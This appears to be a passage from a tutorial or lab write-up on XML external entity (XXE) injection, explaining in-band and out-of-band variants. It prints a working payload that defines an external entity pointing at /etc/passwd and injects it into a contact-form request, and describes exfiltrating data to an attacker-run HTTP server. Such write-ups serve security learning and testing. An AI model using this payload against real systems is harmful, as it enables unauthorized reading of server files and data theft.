Exploitation

In-Band XXE Injection

Here the attacker can see the server response.

Out-of Band XXE Injection

Out-of-band XXE, refers to an XXE vulnerability where the attacker cannot see the response from the server. This requires using alternative channels, such as DNS or HTTP requests to exfiltrate data.

Example of In-Band XXEi

Here is a contact form

I intercept the request via Burp Suite and see that the data is being sent via XML.

I inject an external entity pointing to the file /etc/passwd as follows

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<contact>
<name>&xxe;</name>
<email>test@test.com</email>
<message>test</message>
</contact>

As you can see above, the injection worked successfully.

XML Entity Expansion

Used in XXE attacks which involve defining external entities within XML, which the XML parser expands. Attacker abuse this vulnerability by creating recursive or excessive large entities leading to Denial Of Service attacks or entities that reference sensitive files or services. This method is central to both in-band and out-of-band XXE, as it allows attackers to inject malicious entities into the XML data.

Out-of-band XXE Injection

Here the injection doesn't show results on the user side hence the exfiltrated data has to be received via some attacker-controlled server.

Here I have the following page

Now to receive the data I will start a Python HTTP server on port 1234.

I uploaded a file here and captured the request in Burp Suite as follows after forwarding it.

Here I replaced the URL with the IP of my machine as follows.

Now if I run this then I will get a request on the HTTP server. This says that through this method we can exchange files and exfiltrate data easily.